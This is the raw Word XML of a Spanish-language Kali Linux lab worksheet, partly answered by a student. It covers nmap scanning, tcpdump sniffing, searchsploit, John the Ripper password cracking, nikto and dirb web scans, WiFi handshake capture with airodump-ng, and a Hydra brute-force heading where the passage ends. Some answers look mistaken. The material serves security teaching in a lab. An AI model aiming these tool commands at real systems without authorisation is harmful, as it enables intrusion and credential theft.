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F504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rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🛠</w:t>
      </w:r>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Práctica de Kali Linux (20 Ejercicios)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF1A034" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00291688" w:rsidP="00291688">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>Objetivo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Aprender a utilizar herramientas básicas y avanzadas de Kali Linux en un entorno controlado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369BA735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Requisitos previos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6A7E90" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00291688" w:rsidP="00291688">
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tener Kali Linux instalado en una máquina virtual.</w:t>
      </w:r>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Otra m</w:t>
      </w:r>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>quina virtual o un entorno de prueba (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>, Windows, etc.).</w:t>
      </w:r>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00291688">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:t>Conocer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291688">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:t>comandos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291688">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r w:rsidRPr="00291688">
        <w:t>sicos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291688">
        <w:t xml:space="preserve"> de Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8619C6" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00000000" w:rsidP="00291688">
      <w:r>
        <w:pict w14:anchorId="03B27C20">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F97BB5C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rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sección 1: Comandos Básicos de Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFBB122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Listar interfaces de red disponibles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C730CF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bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="38A8254E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CopiarEditar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ABEC57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ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9698A0" w14:textId="77777777" w:rsid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¿Cuál es tu dirección IP?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017414DA" w14:textId="5A79769F" w:rsidR="00205F5F" w:rsidRDefault="00205F5F" w:rsidP="00291688">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve">10.0.2.15 255.255.255.0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6A15DA" w14:textId="7E258BE0" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00000000" w:rsidP="00291688">
      <w:r>
        <w:pict w14:anchorId="7150857A">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D54356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2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Comprobar conectividad con un ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2784E660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bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3086CA31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CopiarEditar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E07810F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ping -c 4 &lt;IP_DEL_OBJETIVO&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EEEC53" w14:textId="77777777" w:rsid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¿Cuál fue el tiempo de respuesta promedio?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A04D495" w14:textId="37BE5BFF" w:rsidR="00205F5F" w:rsidRPr="00291688" w:rsidRDefault="00205F5F" w:rsidP="00291688">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>3032ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ECF7C2" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00000000" w:rsidP="00291688">
      <w:r>
        <w:pict w14:anchorId="391D9FD1">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E98B85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3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Mostrar procesos en ejecución</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9A3015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bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35334309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CopiarEditar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9F8CF6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lastRenderedPageBreak/>
        <w:t>ps aux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EF60EE" w14:textId="77777777" w:rsid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¿Qué procesos de red están activos en la máquina?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D66A87" w14:textId="63F14380" w:rsidR="00205F5F" w:rsidRPr="00291688" w:rsidRDefault="00205F5F" w:rsidP="00291688">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>Ss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve">, S, </w:t>
      </w:r>
      <w:r w:rsidR="004557EC">
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>I&lt;,I</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6660B3" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00000000" w:rsidP="00291688">
      <w:r>
        <w:pict w14:anchorId="4088F090">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5198B5DA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4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Listar servicios que inician con el sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A854BBA" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00291688" w:rsidP="00291688">
      <w:r w:rsidRPr="00291688">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B70F1E" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00291688" w:rsidP="00291688">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:t>CopiarEditar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="07CB9EA2" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00291688" w:rsidP="00291688">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291688">
        <w:t xml:space="preserve"> list-units --type=service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29917130" w14:textId="77777777" w:rsid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¿Qué servicios esenciales están corriendo?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D274361" w14:textId="1CCBC71E" w:rsidR="004557EC" w:rsidRPr="00291688" w:rsidRDefault="004557EC" w:rsidP="00291688">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>Account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service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console-setup.service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4BB00B17" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00000000" w:rsidP="00291688">
      <w:r>
        <w:pict w14:anchorId="6081A3C5">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA6443A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rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sección 2: Escaneo y Análisis de Redes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74943ADC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5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Escanear puertos abiertos en una IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A3094C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bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA8A0B9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CopiarEditar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022A9348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nmap -p- &lt;IP_DEL_OBJETIVO&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3660DBDE" w14:textId="77777777" w:rsid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¿Cuántos puertos abiertos encontraste?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A56EFBF" w14:textId="46DFA2C4" w:rsidR="004B05EC" w:rsidRPr="00291688" w:rsidRDefault="004B05EC" w:rsidP="00291688">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDF9BA8" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00000000" w:rsidP="00291688">
      <w:r>
        <w:pict w14:anchorId="6874A623">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="69635BDD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6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Detectar sistema operativo y servicios en ejecución</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C81357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bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9AB337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CopiarEditar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DA312D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nmap -A &lt;IP_DEL_OBJETIVO&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479D7047" w14:textId="2EC4A9DF" w:rsidR="00291688" w:rsidRDefault="00291688" w:rsidP="00C933AD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6405"/>
        </w:tabs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¿Cuál es el sistema operativo del objetivo?</w:t>
      </w:r>
      <w:r w:rsidR="00C933AD">
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D274F3" w14:textId="4D20527E" w:rsidR="00C933AD" w:rsidRPr="00291688" w:rsidRDefault="00C933AD" w:rsidP="00C933AD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6405"/>
        </w:tabs>
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve">Hay </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>multiples</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve"> sistemas operativos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE920F7" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00000000" w:rsidP="00291688">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="5E168A4B">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A2A760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7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Identificar dispositivos en una red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FC139F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bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E899D70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CopiarEditar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0069DA5C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nmap -sn 192.168.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EABAE2" w14:textId="77777777" w:rsid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¿Cuántos dispositivos están conectados a la red?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ED22FB" w14:textId="534F177D" w:rsidR="00C933AD" w:rsidRPr="00291688" w:rsidRDefault="00C933AD" w:rsidP="00C933AD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>256 host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03106A8A" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00000000" w:rsidP="00291688">
      <w:r>
        <w:pict w14:anchorId="21C44992">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D3EA5B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8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Interceptar tráfico en la red (Modo Promiscuo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D25DB6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bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C61BF86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CopiarEditar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFD3832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tcpdump -i eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596198B3" w14:textId="77777777" w:rsid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¿Qué tipo de tráfico se observa en la red?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEE3C71" w14:textId="58E805C6" w:rsidR="00982552" w:rsidRPr="00291688" w:rsidRDefault="00982552" w:rsidP="00982552">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>DNS,IP V4, IP V6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102BF042" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00000000" w:rsidP="00291688">
      <w:r>
        <w:pict w14:anchorId="02473637">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00ACD6AB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rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sección 3: Análisis de Vulnerabilidades</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B40490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9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Buscar vulnerabilidades en servicios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721FC2C1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bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477F6587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CopiarEditar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D66BD7D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searchsploit apache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69804F41" w14:textId="77777777" w:rsid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¿Qué </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>exploits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve"> están disponibles para Apache?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7F7202" w14:textId="75C5AA84" w:rsidR="00982552" w:rsidRPr="00291688" w:rsidRDefault="00982552" w:rsidP="00291688">
      <w:pPr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3B2B70C1" wp14:editId="56288589">
            <wp:extent cx="4978606" cy="4018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65" cy="40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71B6" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00000000" w:rsidP="00291688">
      <w:r>
        <w:pict w14:anchorId="00F79D19">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B0520B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rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔟</w:t>
      </w:r>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Analizar seguridad de contraseñas con John the Ripper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4864D0" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00291688" w:rsidP="00291688">
      <w:r w:rsidRPr="00291688">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5039DC" w14:textId="773EAACA" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00291688" w:rsidP="00291688">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:t>CopiarEdita</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="62C86C89" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00291688" w:rsidP="00291688">
      <w:r w:rsidRPr="00291688">
        <w:t>john --wordlist=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291688">
        <w:t>/share/wordlists/rockyou.txt hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF8A5C7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¿Pudiste descifrar alguna contraseña?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FC8D40" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00000000" w:rsidP="00291688">
      <w:r>
        <w:pict w14:anchorId="365275A4">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C38E71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Escanear una web en busca de vulnerabilidades</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663C55BF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bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="33B27247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CopiarEditar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5FD6EB3A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nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve"> -h &lt;URL_DEL_OBJETIVO&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530AFD51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¿Qué fallos de seguridad se detectaron?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A4DFD2" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00000000" w:rsidP="00291688">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="1477EFD7">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2B5B7F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2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Análisis de una página web con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>Dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0961F9AC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bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0EB3E97E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CopiarEditar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27114E7B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dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://&lt;URL_DEL_OBJETIVO&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFC9801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¿Qué directorios ocultos encontraste?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E60379A" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00000000" w:rsidP="00291688">
      <w:r>
        <w:pict w14:anchorId="5838B49D">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C41F59A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rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sección 4: Ataques y Explotación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5977C293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3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Capturar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>handshakes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>WiFi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve"> (necesario adaptador en modo monitor)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627072FE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bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0EF86234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CopiarEditar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69DC15E4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airodump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>-ng wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B40C417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¿Cuántas redes detectaste?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAF6E49" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00000000" w:rsidP="00291688">
      <w:r>
        <w:pict w14:anchorId="1275DD01">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B26CEBE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4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Intentar ataque de fuerza bruta con Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD64243" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00291688" w:rsidP="00291688">
      <w:r w:rsidRPr="00291688">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B8EC45" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00291688" w:rsidP="00291688">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:t>CopiarEditar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
